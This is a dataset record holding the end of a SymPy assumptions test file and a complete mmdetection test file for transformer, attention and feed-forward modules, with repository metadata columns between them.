    assert ask(2*x + y, Q.odd, Assume(x, Q.integer) & Assume(y, Q.even)) == False
    assert ask(2*x + y, Q.odd, Assume(x, Q.integer) & Assume(y, Q.integer)) == None
    assert ask(x*y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.even)) == False
    assert ask(x*y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd)) == True
    # rational/irrational factors do not determine oddness
    assert ask(2*x*y, Q.odd, Assume(x, Q.rational) & Assume(y, Q.rational)) == None
    assert ask(2*x*y, Q.odd, Assume(x, Q.irrational) & Assume(y, Q.irrational)) == None
    assert ask(Abs(x), Q.odd, Assume(x, Q.odd)) == True
def test_prime():
    """ask(Q.prime): products and powers of integers are reported non-prime."""
    x, y = symbols('x y')
    assert ask(x, Q.prime, Assume(x, Q.prime)) == True
    assert ask(x, Q.prime, Assume(x, Q.prime, False)) == False
    assert ask(x, Q.prime, Assume(x, Q.integer)) == None
    assert ask(x, Q.prime, Assume(x, Q.integer, False)) == False
    assert ask(2*x, Q.prime, Assume(x, Q.integer)) == False
    assert ask(x*y, Q.prime) == None
    assert ask(x*y, Q.prime, Assume(x, Q.prime)) == None
    both_integer = Assume(x, Q.integer) & Assume(y, Q.integer)
    assert ask(x*y, Q.prime, both_integer) == False
    assert ask(x**2, Q.prime, Assume(x, Q.integer)) == False
    assert ask(x**2, Q.prime, Assume(x, Q.prime)) == False
    assert ask(x**y, Q.prime, both_integer) == False
def test_positive():
    """ask(Q.positive) for negation, sums, products, powers, exp and Abs."""
    x, y, z, w = symbols('xyzw')
    assert ask(x, Q.positive, Assume(x, Q.positive)) == True
    assert ask(x, Q.positive, Assume(x, Q.negative)) == False
    assert ask(x, Q.positive, Assume(x, Q.nonzero)) == None
    assert ask(-x, Q.positive, Assume(x, Q.positive)) == False
    assert ask(-x, Q.positive, Assume(x, Q.negative)) == True
    assert ask(x+y, Q.positive, Assume(x, Q.positive) & \
               Assume(y, Q.positive)) == True
    assert ask(x+y, Q.positive, Assume(x, Q.positive) & \
               Assume(y, Q.negative)) == None
    assert ask(2*x, Q.positive, Assume(x, Q.positive)) == True
    # product of one positive, two negative and one positive factor: positive
    assumptions = Assume(x, Q.positive) & Assume(y, Q.negative) & \
                  Assume(z, Q.negative) & Assume(w, Q.positive)
    assert ask(x*y*z, Q.positive) == None
    assert ask(x*y*z, Q.positive, assumptions) == True
    assert ask(-x*y*z, Q.positive, assumptions) == False
    assert ask(x**2, Q.positive, Assume(x, Q.positive)) == True
    assert ask(x**2, Q.positive, Assume(x, Q.negative)) == True
    # exponential
    assert ask(exp(x), Q.positive, Assume(x, Q.real)) == True
    assert ask(x + exp(x), Q.positive, Assume(x, Q.real)) == None
    # absolute value
    assert ask(Abs(x), Q.positive) == None # Abs(0) = 0
    assert ask(Abs(x), Q.positive, Assume(x, Q.positive)) == True
@XFAIL
def test_positive_xfail():
    """1/(1 + x**2) is positive for real x, but ask cannot yet prove it.

    Fix: ``x`` was previously undefined, so the test "expectedly failed"
    with a NameError instead of exercising ask at all; define it the same
    way the sibling test_bounded_xfail does.
    """
    x = Symbol('x')
    assert ask(1/(1 + x**2), Q.positive, Assume(x, Q.real)) == True
def test_real():
    """ask(Q.real) for arithmetic, powers, trig/exp and re/im."""
    x, y = symbols('x y')
    assert ask(x, Q.real) == None
    assert ask(x, Q.real, Assume(x, Q.real)) == True
    assert ask(x, Q.real, Assume(x, Q.nonzero)) == True
    assert ask(x, Q.real, Assume(x, Q.positive)) == True
    assert ask(x, Q.real, Assume(x, Q.negative)) == True
    assert ask(x, Q.real, Assume(x, Q.integer)) == True
    assert ask(x, Q.real, Assume(x, Q.even)) == True
    assert ask(x, Q.real, Assume(x, Q.prime)) == True
    # sqrt(-2) is imaginary, so the quotient leaves the reals
    assert ask(x/sqrt(2), Q.real, Assume(x, Q.real)) == True
    assert ask(x/sqrt(-2), Q.real, Assume(x, Q.real)) == False
    I = S.ImaginaryUnit
    assert ask(x+1, Q.real, Assume(x, Q.real)) == True
    assert ask(x+I, Q.real, Assume(x, Q.real)) == False
    assert ask(x+I, Q.real, Assume(x, Q.complex)) == None
    assert ask(2*x, Q.real, Assume(x, Q.real)) == True
    assert ask(I*x, Q.real, Assume(x, Q.real)) == False
    assert ask(I*x, Q.real, Assume(x, Q.imaginary)) == True
    assert ask(I*x, Q.real, Assume(x, Q.complex)) == None
    assert ask(x**2, Q.real, Assume(x, Q.real)) == True
    assert ask(sqrt(x), Q.real, Assume(x, Q.negative)) == False
    assert ask(x**y, Q.real, Assume(x, Q.real) & Assume(y, Q.integer)) == True
    assert ask(x**y, Q.real, Assume(x, Q.real) & Assume(y, Q.real)) == None
    assert ask(x**y, Q.real, Assume(x, Q.positive) & \
               Assume(y, Q.real)) == True
    # trigonometric functions
    assert ask(sin(x), Q.real) == None
    assert ask(cos(x), Q.real) == None
    assert ask(sin(x), Q.real, Assume(x, Q.real)) == True
    assert ask(cos(x), Q.real, Assume(x, Q.real)) == True
    # exponential function
    assert ask(exp(x), Q.real) == None
    assert ask(exp(x), Q.real, Assume(x, Q.real)) == True
    assert ask(x + exp(x), Q.real, Assume(x, Q.real)) == True
    # complex-part helpers are always real-valued
    assert ask(re(x), Q.real) == True
    assert ask(im(x), Q.real) == True
def test_algebraic():
    """ask('algebraic') on exact radicals, transcendental values and floats."""
    x, y = symbols('x,y')
    assert ask(x, 'algebraic') == None
    assert ask(I, 'algebraic') == True
    assert ask(2*I, 'algebraic') == True
    assert ask(I/3, 'algebraic') == True
    assert ask(sqrt(7), 'algebraic') == True
    assert ask(2*sqrt(7), 'algebraic') == True
    assert ask(sqrt(7)/3, 'algebraic') == True
    assert ask(I*sqrt(3), 'algebraic') == True
    assert ask(sqrt(1+I*sqrt(3)), 'algebraic') == True
    # NOTE(review): ** binds tighter than *, so this is 1 + I*(sqrt(3)**(17/31)),
    # not (1 + I*sqrt(3))**(17/31) -- possibly the latter was intended; confirm.
    assert ask((1+I*sqrt(3)**(S(17)/31)), 'algebraic') == True
    assert ask((1+I*sqrt(3)**(S(17)/pi)), 'algebraic') == False
    assert ask(sin(7), 'algebraic') == None
    assert ask(sqrt(sin(7)), 'algebraic') == None
    assert ask(sqrt(y+I*sqrt(7)), 'algebraic') == None
    assert ask(oo, 'algebraic') == False
    assert ask(-oo, 'algebraic') == False
    # a Float is treated as an approximation, not an exact algebraic number
    assert ask(2.47, 'algebraic') == False
def test_global():
    """Assumptions registered in the global context are visible to ask()."""
    sym = symbols('x')
    assert ask(sym, Q.integer) == None
    # register, query, then clear so later tests are unaffected
    global_assumptions.add(Assume(sym, Q.integer))
    assert ask(sym, Q.integer) == True
    global_assumptions.clear()
    assert ask(sym, Q.integer) == None
def test_custom_context():
    """A caller-supplied AssumptionsContext applies to a single ask() call only."""
    sym = symbols('x')
    assert ask(sym, Q.integer) == None
    ctx = AssumptionsContext()
    ctx.add(Assume(sym, Q.integer))
    assert ask(sym, Q.integer, context=ctx) == True
    # the default (global) context was never modified
    assert ask(sym, Q.integer) == None
def test_functions_in_assumptions():
    """Assumptions may be arbitrary boolean combinations of predicates."""
    from sympy.logic.boolalg import Equivalent, Xor
    x = symbols('x')
    assert ask(x, Q.negative, Q.real(x) >> Q.positive(x)) is False
    assert ask(x, Q.negative, Equivalent(Q.real(x), Q.positive(x))) is False
    assert ask(x, Q.negative, Xor(Q.real(x), Q.negative(x))) is False
def test_is_true():
    """ask(..., Q.is_true) evaluates boolean combinations of predicates."""
    from sympy.logic.boolalg import Equivalent, Implies
    x = symbols('x')
    assert ask(True, Q.is_true) is True
    assert ask(~Q.negative(x), Q.is_true, Q.positive(x)) is True
    assert ask(~Q.real(x), Q.is_true, Q.commutative(x)) is None
    assert ask(Q.negative(x) & Q.integer(x), Q.is_true, Q.positive(x)) is False
    assert ask(Q.negative(x) & Q.integer(x), Q.is_true) is None
    assert ask(Q.real(x) | Q.integer(x), Q.is_true, Q.positive(x)) is True
    assert ask(Q.real(x) | Q.integer(x), Q.is_true) is None
    assert ask(Q.real(x) >> Q.positive(x), Q.is_true, Q.negative(x)) is False
    # evaluate=False keeps the Implies node intact for ask to analyse
    assert ask(Implies(Q.real(x), Q.positive(x), evaluate=False), Q.is_true,
               Q.negative(x)) is False
    assert ask(Implies(Q.real(x), Q.positive(x), evaluate=False), Q.is_true) is None
    assert ask(Equivalent(Q.integer(x), Q.even(x)), Q.is_true, Q.even(x)) is True
    assert ask(Equivalent(Q.integer(x), Q.even(x)), Q.is_true) is None
    assert ask(Equivalent(Q.positive(x), Q.integer(x)), Q.is_true, Q.integer(x)) is None
def test_incompatible_resolutors():
    """Conflicting definite answers from two handlers raise ValueError;
    an inconclusive (None) answer does not conflict."""
    x = symbols('x')
    class Prime2AskHandler(AskHandler):
        @staticmethod
        def Number(expr, assumptions):
            return True
    register_handler('prime', Prime2AskHandler)
    # the always-True handler disagrees with the stock resolution of ask(4, prime)
    raises(ValueError, 'ask(4, Q.prime)')
    remove_handler('prime', Prime2AskHandler)
    class InconclusiveHandler(AskHandler):
        @staticmethod
        def Number(expr, assumptions):
            return None
    register_handler('prime', InconclusiveHandler)
    # None is compatible with any definite answer
    assert ask(3, Q.prime) == True
def test_key_extensibility():
    """Test that you can add keys to the ask system at runtime."""
    x = Symbol('x')
    # make sure the key is not defined yet
    raises(AttributeError, "ask(x, 'my_key')")
    class MyAskHandler(AskHandler):
        @staticmethod
        def Symbol(expr, assumptions):
            return True
    register_handler('my_key', MyAskHandler)
    assert ask(x, 'my_key') == True
    # the handler only resolves Symbol nodes, so x+1 stays unknown
    assert ask(x+1, 'my_key') == None
    remove_handler('my_key', MyAskHandler)
def test_type_extensibility():
    """test that new types can be added to the ask system at runtime

    We create a custom type MyType, and override ask Q.prime=True with handler
    MyAskHandler for this type
    TODO: test incompatible resolutors
    """
    from sympy.core import Basic
    class MyType(Basic):
        pass
    class MyAskHandler(AskHandler):
        @staticmethod
        def MyType(expr, assumptions):
            return True
    a = MyType()
    # NOTE(review): this handler is never removed, so it stays registered for
    # Q.prime after the test finishes -- may leak into later tests; confirm.
    register_handler(Q.prime, MyAskHandler)
    assert ask(a, Q.prime) == True
| 42.667311
| 88
| 0.570085
| 6,847
| 44,118
| 3.659851
| 0.024828
| 0.252843
| 0.095455
| 0.099206
| 0.905942
| 0.833912
| 0.78802
| 0.748753
| 0.71188
| 0.63119
| 0
| 0.00745
| 0.263702
| 44,118
| 1,033
| 89
| 42.708616
| 0.763976
| 0.017227
| 0
| 0.359679
| 0
| 0
| 0.006445
| 0
| 0
| 0
| 0
| 0.000968
| 0.806415
| 1
| 0.046964
| false
| 0.001145
| 0.009164
| 0.004582
| 0.066438
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7fe24d4776e3f3bbce4174003ef6309ab600bfa7
| 20,396
|
py
|
Python
|
tests/test_models/test_utils/test_transformer.py
|
yypurpose/mmdetection
|
ec6bfd96eae0af047c623f3d1ec31b0b3f1f4a6c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_models/test_utils/test_transformer.py
|
yypurpose/mmdetection
|
ec6bfd96eae0af047c623f3d1ec31b0b3f1f4a6c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_models/test_utils/test_transformer.py
|
yypurpose/mmdetection
|
ec6bfd96eae0af047c623f3d1ec31b0b3f1f4a6c
|
[
"Apache-2.0"
] | null | null | null |
from unittest.mock import patch
import pytest
import torch
from mmdet.models.utils import (FFN, MultiheadAttention, Transformer,
TransformerDecoder, TransformerDecoderLayer,
TransformerEncoder, TransformerEncoderLayer)
def _ffn_forward(self, x, residual=None):
if residual is None:
residual = x
residual_str = residual.split('_')[-1]
if '(residual' in residual_str:
residual_str = residual_str.split('(residual')[0]
return x + '_ffn(residual={})'.format(residual_str)
def _multihead_attention_forward(self,
x,
key=None,
value=None,
residual=None,
query_pos=None,
key_pos=None,
attn_mask=None,
key_padding_mask=None,
selfattn=True):
if residual is None:
residual = x
residual_str = residual.split('_')[-1]
if '(residual' in residual_str:
residual_str = residual_str.split('(residual')[0]
attn_str = 'selfattn' if selfattn else 'multiheadattn'
return x + '_{}(residual={})'.format(attn_str, residual_str)
def _encoder_layer_forward(self,
x,
pos=None,
attn_mask=None,
key_padding_mask=None):
norm_cnt = 0
inp_residual = x
for layer in self.order:
if layer == 'selfattn':
x = self.self_attn(
x,
x,
x,
inp_residual if self.pre_norm else None,
query_pos=pos,
attn_mask=attn_mask,
key_padding_mask=key_padding_mask)
inp_residual = x
elif layer == 'norm':
x = x + '_norm{}'.format(norm_cnt)
norm_cnt += 1
elif layer == 'ffn':
x = self.ffn(x, inp_residual if self.pre_norm else None)
else:
raise ValueError(f'Unsupported layer type {layer}.')
return x
def _decoder_layer_forward(self,
x,
memory,
memory_pos=None,
query_pos=None,
memory_attn_mask=None,
target_attn_mask=None,
memory_key_padding_mask=None,
target_key_padding_mask=None):
norm_cnt = 0
inp_residual = x
for layer in self.order:
if layer == 'selfattn':
x = self.self_attn(
x,
x,
x,
inp_residual if self.pre_norm else None,
query_pos,
attn_mask=target_attn_mask,
key_padding_mask=target_key_padding_mask)
inp_residual = x
elif layer == 'norm':
x = x + '_norm{}'.format(norm_cnt)
norm_cnt += 1
elif layer == 'multiheadattn':
x = self.multihead_attn(
x,
memory,
memory,
inp_residual if self.pre_norm else None,
query_pos,
key_pos=memory_pos,
attn_mask=memory_attn_mask,
key_padding_mask=memory_key_padding_mask,
selfattn=False)
inp_residual = x
elif layer == 'ffn':
x = self.ffn(x, inp_residual if self.pre_norm else None)
else:
raise ValueError(f'Unsupported layer type {layer}.')
return x
def test_multihead_attention(embed_dims=8,
                             num_heads=2,
                             dropout=0.1,
                             num_query=5,
                             num_key=10,
                             batch_size=1):
    """Smoke-test MultiheadAttention output shapes for every call signature."""
    attn = MultiheadAttention(embed_dims, num_heads, dropout)
    expected_shape = (num_query, batch_size, embed_dims)

    # plain self attention
    query = torch.rand(num_query, batch_size, embed_dims)
    assert attn(query).shape == expected_shape

    # cross attention with an explicit key
    key = torch.rand(num_key, batch_size, embed_dims)
    assert attn(query, key).shape == expected_shape

    # explicit residual tensor
    residual = torch.rand(num_query, batch_size, embed_dims)
    assert attn(query, key, key, residual).shape == expected_shape

    # positional encodings for query and key
    query_pos = torch.rand(num_query, batch_size, embed_dims)
    key_pos = torch.rand(num_key, batch_size, embed_dims)
    assert attn(query, key, None, residual, query_pos,
                key_pos).shape == expected_shape

    # key padding mask
    key_padding_mask = torch.rand(batch_size, num_key) > 0.5
    assert attn(query, key, None, residual, query_pos, key_pos, None,
                key_padding_mask).shape == expected_shape

    # attention mask
    attn_mask = torch.rand(num_query, num_key) > 0.5
    assert attn(query, key, key, residual, query_pos, key_pos, attn_mask,
                key_padding_mask).shape == expected_shape
def test_ffn(embed_dims=8, feedforward_channels=8, num_fcs=2, batch_size=1):
    """Smoke-test FFN: invalid num_fcs raises; valid configs keep the shape."""
    # test invalid num_fcs: a single fully-connected layer is rejected
    with pytest.raises(AssertionError):
        module = FFN(embed_dims, feedforward_channels, 1)
    module = FFN(embed_dims, feedforward_channels, num_fcs)
    x = torch.rand(batch_size, embed_dims)
    out = module(x)
    assert out.shape == (batch_size, embed_dims)
    # set residual: explicit residual tensor supplied by the caller
    residual = torch.rand(batch_size, embed_dims)
    out = module(x, residual)
    assert out.shape == (batch_size, embed_dims)
    # test case with the residual connection disabled entirely
    module = FFN(embed_dims, feedforward_channels, num_fcs, add_residual=False)
    x = torch.rand(batch_size, embed_dims)
    out = module(x)
    assert out.shape == (batch_size, embed_dims)
def test_transformer_encoder_layer(embed_dims=8,
                                   num_heads=2,
                                   feedforward_channels=8,
                                   num_key=10,
                                   batch_size=1):
    """Test TransformerEncoderLayer: invalid orders raise, output shapes are
    preserved, and (via string-tracing mocks) sub-layers run in the exact
    configured order with the right residual sources."""
    x = torch.rand(num_key, batch_size, embed_dims)
    # test invalid number of order entries (this 5-element order is rejected)
    with pytest.raises(AssertionError):
        order = ('norm', 'selfattn', 'norm', 'ffn', 'norm')
        module = TransformerEncoderLayer(
            embed_dims, num_heads, feedforward_channels, order=order)
    # test invalid value of order
    with pytest.raises(AssertionError):
        order = ('norm', 'selfattn', 'norm', 'unknown')
        module = TransformerEncoderLayer(
            embed_dims, num_heads, feedforward_channels, order=order)
    module = TransformerEncoderLayer(embed_dims, num_heads,
                                     feedforward_channels)
    key_padding_mask = torch.rand(batch_size, num_key) > 0.5
    out = module(x, key_padding_mask=key_padding_mask)
    # the default order is post-norm
    assert not module.pre_norm
    assert out.shape == (num_key, batch_size, embed_dims)
    # set pos
    pos = torch.rand(num_key, batch_size, embed_dims)
    out = module(x, pos, key_padding_mask=key_padding_mask)
    assert out.shape == (num_key, batch_size, embed_dims)
    # set attn_mask
    attn_mask = torch.rand(num_key, num_key) > 0.5
    out = module(x, pos, attn_mask, key_padding_mask)
    assert out.shape == (num_key, batch_size, embed_dims)
    # set pre_norm: an order starting with 'norm' switches to pre-norm
    order = ('norm', 'selfattn', 'norm', 'ffn')
    module = TransformerEncoderLayer(
        embed_dims, num_heads, feedforward_channels, order=order)
    assert module.pre_norm
    out = module(x, pos, attn_mask, key_padding_mask)
    assert out.shape == (num_key, batch_size, embed_dims)

    @patch('mmdet.models.utils.TransformerEncoderLayer.forward',
           _encoder_layer_forward)
    @patch('mmdet.models.utils.FFN.forward', _ffn_forward)
    @patch('mmdet.models.utils.MultiheadAttention.forward',
           _multihead_attention_forward)
    def test_order():
        # With string-tracing mocks installed, the output records every
        # sub-layer call and the residual it received.
        module = TransformerEncoderLayer(embed_dims, num_heads,
                                         feedforward_channels)
        out = module('input')
        assert out == 'input_selfattn(residual=input)_norm0_ffn' \
                      '(residual=norm0)_norm1'
        # pre_norm: residual of the ffn is the self-attention output
        order = ('norm', 'selfattn', 'norm', 'ffn')
        module = TransformerEncoderLayer(
            embed_dims, num_heads, feedforward_channels, order=order)
        out = module('input')
        assert out == 'input_norm0_selfattn(residual=input)_' \
                      'norm1_ffn(residual=selfattn)'

    test_order()
def test_transformer_decoder_layer(embed_dims=8,
                                   num_heads=2,
                                   feedforward_channels=8,
                                   num_key=10,
                                   num_query=5,
                                   batch_size=1):
    """Test TransformerDecoderLayer: invalid orders raise, output shapes are
    preserved for every optional mask/pos combination, and (via mocks) the
    sub-layers execute in the configured order.

    Fix: `memory_attn_mask` and `target_attn_mask` previously omitted the
    `> 0.5` threshold, yielding float masks; every other mask in this file
    (including the sibling `test_transformer_decoder`) uses boolean masks,
    so they are now thresholded for consistency.
    """
    query = torch.rand(num_query, batch_size, embed_dims)
    # test invalid number of order entries (7-element order is rejected)
    with pytest.raises(AssertionError):
        order = ('norm', 'selfattn', 'norm', 'multiheadattn', 'norm', 'ffn',
                 'norm')
        module = TransformerDecoderLayer(
            embed_dims, num_heads, feedforward_channels, order=order)
    # test invalid value of order
    with pytest.raises(AssertionError):
        order = ('norm', 'selfattn', 'unknown', 'multiheadattn', 'norm', 'ffn')
        module = TransformerDecoderLayer(
            embed_dims, num_heads, feedforward_channels, order=order)
    module = TransformerDecoderLayer(embed_dims, num_heads,
                                     feedforward_channels)
    memory = torch.rand(num_key, batch_size, embed_dims)
    # the default order is post-norm
    assert not module.pre_norm
    out = module(query, memory)
    assert out.shape == (num_query, batch_size, embed_dims)
    # set query_pos
    query_pos = torch.rand(num_query, batch_size, embed_dims)
    out = module(query, memory, memory_pos=None, query_pos=query_pos)
    assert out.shape == (num_query, batch_size, embed_dims)
    # set memory_pos
    memory_pos = torch.rand(num_key, batch_size, embed_dims)
    out = module(query, memory, memory_pos, query_pos)
    assert out.shape == (num_query, batch_size, embed_dims)
    # set memory_key_padding_mask
    memory_key_padding_mask = torch.rand(batch_size, num_key) > 0.5
    out = module(
        query,
        memory,
        memory_pos,
        query_pos,
        memory_key_padding_mask=memory_key_padding_mask)
    assert out.shape == (num_query, batch_size, embed_dims)
    # set target_key_padding_mask
    target_key_padding_mask = torch.rand(batch_size, num_query) > 0.5
    out = module(
        query,
        memory,
        memory_pos,
        query_pos,
        memory_key_padding_mask=memory_key_padding_mask,
        target_key_padding_mask=target_key_padding_mask)
    assert out.shape == (num_query, batch_size, embed_dims)
    # set memory_attn_mask (boolean, consistent with the other mask tests)
    memory_attn_mask = torch.rand(num_query, num_key) > 0.5
    out = module(
        query,
        memory,
        memory_pos,
        query_pos,
        memory_attn_mask,
        memory_key_padding_mask=memory_key_padding_mask,
        target_key_padding_mask=target_key_padding_mask)
    assert out.shape == (num_query, batch_size, embed_dims)
    # set target_attn_mask (boolean, consistent with the other mask tests)
    target_attn_mask = torch.rand(num_query, num_query) > 0.5
    out = module(query, memory, memory_pos, query_pos, memory_attn_mask,
                 target_attn_mask, memory_key_padding_mask,
                 target_key_padding_mask)
    assert out.shape == (num_query, batch_size, embed_dims)
    # pre_norm: an order starting with 'norm' switches to pre-norm
    order = ('norm', 'selfattn', 'norm', 'multiheadattn', 'norm', 'ffn')
    module = TransformerDecoderLayer(
        embed_dims, num_heads, feedforward_channels, order=order)
    assert module.pre_norm
    out = module(
        query,
        memory,
        memory_pos,
        query_pos,
        memory_attn_mask,
        memory_key_padding_mask=memory_key_padding_mask,
        target_key_padding_mask=target_key_padding_mask)
    assert out.shape == (num_query, batch_size, embed_dims)

    @patch('mmdet.models.utils.TransformerDecoderLayer.forward',
           _decoder_layer_forward)
    @patch('mmdet.models.utils.FFN.forward', _ffn_forward)
    @patch('mmdet.models.utils.MultiheadAttention.forward',
           _multihead_attention_forward)
    def test_order():
        # With string-tracing mocks installed, the output records every
        # sub-layer call and the residual it received.
        module = TransformerDecoderLayer(embed_dims, num_heads,
                                         feedforward_channels)
        out = module('input', 'memory')
        assert out == 'input_selfattn(residual=input)_norm0_multiheadattn' \
                      '(residual=norm0)_norm1_ffn(residual=norm1)_norm2'
        # pre_norm
        order = ('norm', 'selfattn', 'norm', 'multiheadattn', 'norm', 'ffn')
        module = TransformerDecoderLayer(
            embed_dims, num_heads, feedforward_channels, order=order)
        out = module('input', 'memory')
        assert out == 'input_norm0_selfattn(residual=input)_norm1_' \
                      'multiheadattn(residual=selfattn)_norm2_ffn(residual=' \
                      'multiheadattn)'

    test_order()
def test_transformer_encoder(num_layers=2,
                             embed_dims=8,
                             num_heads=2,
                             feedforward_channels=8,
                             num_key=10,
                             batch_size=1):
    """Smoke-test TransformerEncoder output shapes in post- and pre-norm
    configurations; pre-norm additionally creates a final `norm` module."""
    module = TransformerEncoder(num_layers, embed_dims, num_heads,
                                feedforward_channels)
    # default configuration is post-norm with no trailing norm module
    assert not module.pre_norm
    assert module.norm is None
    x = torch.rand(num_key, batch_size, embed_dims)
    out = module(x)
    assert out.shape == (num_key, batch_size, embed_dims)
    # set pos
    pos = torch.rand(num_key, batch_size, embed_dims)
    out = module(x, pos)
    assert out.shape == (num_key, batch_size, embed_dims)
    # set key_padding_mask (attn_mask passed as None)
    key_padding_mask = torch.rand(batch_size, num_key) > 0.5
    out = module(x, pos, None, key_padding_mask)
    assert out.shape == (num_key, batch_size, embed_dims)
    # set attn_mask
    attn_mask = torch.rand(num_key, num_key) > 0.5
    out = module(x, pos, attn_mask, key_padding_mask)
    assert out.shape == (num_key, batch_size, embed_dims)
    # pre_norm: also instantiates the trailing norm module
    order = ('norm', 'selfattn', 'norm', 'ffn')
    module = TransformerEncoder(
        num_layers, embed_dims, num_heads, feedforward_channels, order=order)
    assert module.pre_norm
    assert module.norm is not None
    out = module(x, pos, attn_mask, key_padding_mask)
    assert out.shape == (num_key, batch_size, embed_dims)
def test_transformer_decoder(num_layers=2,
                             embed_dims=8,
                             num_heads=2,
                             feedforward_channels=8,
                             num_key=10,
                             num_query=5,
                             batch_size=1):
    """Smoke-test TransformerDecoder output shapes.

    The decoder output carries a leading stacking dimension: 1 by default,
    or `num_layers` when `return_intermediate=True`.
    """
    module = TransformerDecoder(num_layers, embed_dims, num_heads,
                                feedforward_channels)
    query = torch.rand(num_query, batch_size, embed_dims)
    memory = torch.rand(num_key, batch_size, embed_dims)
    out = module(query, memory)
    assert out.shape == (1, num_query, batch_size, embed_dims)
    # set query_pos
    query_pos = torch.rand(num_query, batch_size, embed_dims)
    out = module(query, memory, query_pos=query_pos)
    assert out.shape == (1, num_query, batch_size, embed_dims)
    # set memory_pos
    memory_pos = torch.rand(num_key, batch_size, embed_dims)
    out = module(query, memory, memory_pos, query_pos)
    assert out.shape == (1, num_query, batch_size, embed_dims)
    # set memory_key_padding_mask
    memory_key_padding_mask = torch.rand(batch_size, num_key) > 0.5
    out = module(
        query,
        memory,
        memory_pos,
        query_pos,
        memory_key_padding_mask=memory_key_padding_mask)
    assert out.shape == (1, num_query, batch_size, embed_dims)
    # set target_key_padding_mask
    target_key_padding_mask = torch.rand(batch_size, num_query) > 0.5
    out = module(
        query,
        memory,
        memory_pos,
        query_pos,
        memory_key_padding_mask=memory_key_padding_mask,
        target_key_padding_mask=target_key_padding_mask)
    assert out.shape == (1, num_query, batch_size, embed_dims)
    # set memory_attn_mask (target_attn_mask passed as None)
    memory_attn_mask = torch.rand(num_query, num_key) > 0.5
    out = module(query, memory, memory_pos, query_pos, memory_attn_mask, None,
                 memory_key_padding_mask, target_key_padding_mask)
    assert out.shape == (1, num_query, batch_size, embed_dims)
    # set target_attn_mask
    target_attn_mask = torch.rand(num_query, num_query) > 0.5
    out = module(query, memory, memory_pos, query_pos, memory_attn_mask,
                 target_attn_mask, memory_key_padding_mask,
                 target_key_padding_mask)
    assert out.shape == (1, num_query, batch_size, embed_dims)
    # pre_norm
    order = ('norm', 'selfattn', 'norm', 'multiheadattn', 'norm', 'ffn')
    module = TransformerDecoder(
        num_layers, embed_dims, num_heads, feedforward_channels, order=order)
    out = module(query, memory, memory_pos, query_pos, memory_attn_mask,
                 target_attn_mask, memory_key_padding_mask,
                 target_key_padding_mask)
    assert out.shape == (1, num_query, batch_size, embed_dims)
    # return_intermediate: one stacked output per decoder layer
    module = TransformerDecoder(
        num_layers,
        embed_dims,
        num_heads,
        feedforward_channels,
        order=order,
        return_intermediate=True)
    out = module(query, memory, memory_pos, query_pos, memory_attn_mask,
                 target_attn_mask, memory_key_padding_mask,
                 target_key_padding_mask)
    assert out.shape == (num_layers, num_query, batch_size, embed_dims)
def test_transformer(num_enc_layers=2,
                     num_dec_layers=2,
                     embed_dims=8,
                     num_heads=2,
                     num_query=5,
                     batch_size=1):
    """End-to-end smoke-test of the full Transformer (DETR-style inputs).

    Checks the (hidden states, memory) output shapes for the default,
    pre-norm, and return-intermediate configurations; hidden states carry a
    leading stacking dimension (1 by default, `num_dec_layers` when
    intermediate decoder outputs are returned).
    """
    module = Transformer(embed_dims, num_heads, num_enc_layers, num_dec_layers)
    height, width = 8, 6
    # image-like feature map plus padding mask and positional embedding
    x = torch.rand(batch_size, embed_dims, height, width)
    mask = torch.rand(batch_size, height, width) > 0.5
    query_embed = torch.rand(num_query, embed_dims)
    pos_embed = torch.rand(batch_size, embed_dims, height, width)
    hs, mem = module(x, mask, query_embed, pos_embed)
    assert hs.shape == (1, batch_size, num_query, embed_dims)
    assert mem.shape == (batch_size, embed_dims, height, width)
    # pre_norm
    module = Transformer(
        embed_dims, num_heads, num_enc_layers, num_dec_layers, pre_norm=True)
    hs, mem = module(x, mask, query_embed, pos_embed)
    assert hs.shape == (1, batch_size, num_query, embed_dims)
    assert mem.shape == (batch_size, embed_dims, height, width)
    # return_intermediate: one hidden-state slice per decoder layer
    module = Transformer(
        embed_dims,
        num_heads,
        num_enc_layers,
        num_dec_layers,
        return_intermediate_dec=True)
    hs, mem = module(x, mask, query_embed, pos_embed)
    assert hs.shape == (num_dec_layers, batch_size, num_query, embed_dims)
    assert mem.shape == (batch_size, embed_dims, height, width)
    # pre_norm and return_intermediate combined
    module = Transformer(
        embed_dims,
        num_heads,
        num_enc_layers,
        num_dec_layers,
        pre_norm=True,
        return_intermediate_dec=True)
    hs, mem = module(x, mask, query_embed, pos_embed)
    assert hs.shape == (num_dec_layers, batch_size, num_query, embed_dims)
    assert mem.shape == (batch_size, embed_dims, height, width)
    # test init_weights runs without error
    module.init_weights()
| 38.923664
| 80
| 0.597029
| 2,404
| 20,396
| 4.738353
| 0.046173
| 0.07743
| 0.078659
| 0.096392
| 0.88605
| 0.87139
| 0.858397
| 0.817926
| 0.785532
| 0.737775
| 0
| 0.007597
| 0.315944
| 20,396
| 523
| 81
| 38.998088
| 0.808845
| 0.036674
| 0
| 0.731884
| 0
| 0
| 0.058534
| 0.02987
| 0
| 0
| 0
| 0
| 0.144928
| 1
| 0.031401
| false
| 0
| 0.009662
| 0
| 0.050725
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d2aaa2bb45d5af603b3fe40ff51e7535309af62
| 129
|
py
|
Python
|
py/tests/test_sample.py
|
andrewblim/advent-of-code-2020
|
dbc45b9967770f8015f3609b88873bdefcfdc28a
|
[
"MIT"
] | null | null | null |
py/tests/test_sample.py
|
andrewblim/advent-of-code-2020
|
dbc45b9967770f8015f3609b88873bdefcfdc28a
|
[
"MIT"
] | null | null | null |
py/tests/test_sample.py
|
andrewblim/advent-of-code-2020
|
dbc45b9967770f8015f3609b88873bdefcfdc28a
|
[
